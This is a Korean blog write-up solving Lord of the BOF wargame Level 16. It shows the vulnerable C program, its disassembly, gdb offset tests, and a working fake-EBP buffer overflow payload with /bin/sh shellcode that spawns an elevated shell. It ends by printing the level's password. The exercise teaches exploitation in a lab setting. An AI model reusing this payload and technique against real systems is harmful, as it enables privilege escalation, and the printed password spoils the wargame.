Sh4n3e

[시스템해킹][LOB] Level 16 : Assassin -> Zombie_assassin 본문

Wargame/LOB

[시스템해킹][LOB] Level 16 : Assassin -> Zombie_assassin

sh4n3e 2017. 7. 18. 17:26

이번 문제는 이전 문제와 비슷하면서도 약간 응용이 필요한 문제이다. 보면 FEBP라고 써있는데, 딱봐도 EBP를 이용해라 라고 말해주고있다. 


[assassin@localhost assassin]$ cat zombie_assassin.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - zombie_assassin

        - FEBP

*/


#include <stdio.h>

#include <stdlib.h>


main(int argc, char *argv[])

{

char buffer[40];


if(argc < 2){

printf("argv error\n");

exit(0);

}


if(argv[1][47] == '\xbf')

{

printf("stack retbayed you!\n");

exit(0);

}


        if(argv[1][47] == '\x40')

        {

                printf("library retbayed you, too!!\n");

                exit(0);

        }


// strncpy instead of strcpy!

strncpy(buffer, argv[1], 48); 

printf("%s\n", buffer);

}



(gdb) disass main

Dump of assembler code for function main:

0x8048440 <main>: push   %ebp

0x8048441 <main+1>: mov    %ebp,%esp

0x8048443 <main+3>: sub    %esp,40

0x8048446 <main+6>: cmp    DWORD PTR [%ebp+8],1

0x804844a <main+10>: jg     0x8048463 <main+35>

0x804844c <main+12>: push   0x8048540

0x8048451 <main+17>: call   0x8048354 <printf>

0x8048456 <main+22>: add    %esp,4

0x8048459 <main+25>: push   0

0x804845b <main+27>: call   0x8048364 <exit>

0x8048460 <main+32>: add    %esp,4

0x8048463 <main+35>: mov    %eax,DWORD PTR [%ebp+12]

0x8048466 <main+38>: add    %eax,4

0x8048469 <main+41>: mov    %edx,DWORD PTR [%eax]

0x804846b <main+43>: add    %edx,47

0x804846e <main+46>: cmp    BYTE PTR [%edx],0xbf

0x8048471 <main+49>: jne    0x8048490 <main+80>

0x8048473 <main+51>: push   0x804854c

0x8048478 <main+56>: call   0x8048354 <printf>

0x804847d <main+61>: add    %esp,4

0x8048480 <main+64>: push   0

0x8048482 <main+66>: call   0x8048364 <exit>

0x8048487 <main+71>: add    %esp,4

0x804848a <main+74>: lea    %esi,[%esi]

0x8048490 <main+80>: mov    %eax,DWORD PTR [%ebp+12]

0x8048493 <main+83>: add    %eax,4

0x8048496 <main+86>: mov    %edx,DWORD PTR [%eax]

0x8048498 <main+88>: add    %edx,47

0x804849b <main+91>: cmp    BYTE PTR [%edx],0x40

0x804849e <main+94>: jne    0x80484b7 <main+119>

0x80484a0 <main+96>: push   0x8048561

0x80484a5 <main+101>: call   0x8048354 <printf>

0x80484aa <main+106>: add    %esp,4

0x80484ad <main+109>: push   0

0x80484af <main+111>: call   0x8048364 <exit>

0x80484b4 <main+116>: add    %esp,4

0x80484b7 <main+119>: push   48

0x80484b9 <main+121>: mov    %eax,DWORD PTR [%ebp+12]

0x80484bc <main+124>: add    %eax,4

0x80484bf <main+127>: mov    %edx,DWORD PTR [%eax]

0x80484c1 <main+129>: push   %edx

0x80484c2 <main+130>: lea    %eax,[%ebp-40]

0x80484c5 <main+133>: push   %eax

0x80484c6 <main+134>: call   0x8048374 <strncpy>

0x80484cb <main+139>: add    %esp,12

0x80484ce <main+142>: lea    %eax,[%ebp-40]

0x80484d1 <main+145>: push   %eax

0x80484d2 <main+146>: push   0x804857e

0x80484d7 <main+151>: call   0x8048354 <printf>

0x80484dc <main+156>: add    %esp,8

0x80484df <main+159>: leave  

0x80484e0 <main+160>: ret    

0x80484e1 <main+161>: nop    

0x80484e2 <main+162>: nop  


뛰는자리 확인을 위해 임의의 페이로드를 만들어 실행시켜 본다.


(gdb) r $(python -c 'print "A"*4+"B"*36+"\x70\xfc\xff\xbf"+"\xdf\x84\x04\x08"')

The program being debugged has been started already.

Start it from the beginning? (y or n) y


Starting program: /home/assassin/assassin_zombie $(python -c 'print "A"*4+"B"*36+"\x70\xfc\xff\xbf"+"\xdf\x84\x04\x08"')

AAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBp���߄


Breakpoint 1, 0x80484df in main ()

2: x/i $eip  0x80484df <main+159>: leave  

(gdb) x/20x $esp

0xbffffc40: 0x41414141 0x42424242 0x42424242 0x42424242

0xbffffc50: 0x42424242 0x42424242 0x42424242 0x42424242

0xbffffc60: 0x42424242 0x42424242 0xbffffc70 0x080484df

0xbffffc70: 0x00000002 0xbffffcb4 0xbffffcc0 0x40013868

0xbffffc80: 0x00000002 0x08048390 0x00000000 0x080483b1


(gdb) r $(python -c 'print "A"*8+"B"*32+"\x40\xfc\xff\xbf"+"\xdf\x84\x04\x08"')

The program being debugged has been started already.

Start it from the beginning? (y or n) y


Starting program: /home/assassin/assassin_zombie $(python -c 'print "A"*8+"B"*32+"\x40\xfc\xff\xbf"+"\xdf\x84\x04\x08"')

AAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB@���߄


Breakpoint 1, 0x80484df in main ()

(gdb) c

Continuing.


Breakpoint 1, 0x80484df in main ()

(gdb) c

Continuing.


Program received signal SIGSEGV, Segmentation fault.

0x41414141 in ?? ()



 $(python -c 'print "A"*4+"\x47\xfc\xff\xbf"+"\x90"*8+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89

\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"+"\x40\xfc\xff\xbf"+"\xdf\x84\x04\x08"')


따라서 만들어진 페이로드를 통해 실행시키면 아래와 같이 쉘코드가 실행되는 것을 확인할 수 있다.


[assassin@localhost assassin]$ ./zombie_assassin $(python -c 'print "A"*4+"\x4>

AAAAG�����������1�Ph//shh/bin��PS�ᙰ

                                   @���߄

bash$ id

uid=515(assassin) gid=515(assassin) euid=516(zombie_assassin) egid=516(zombie_assassin) groups=515(assassin)

bash$ /bin/my-pass

euid = 516

no place to hide



Comments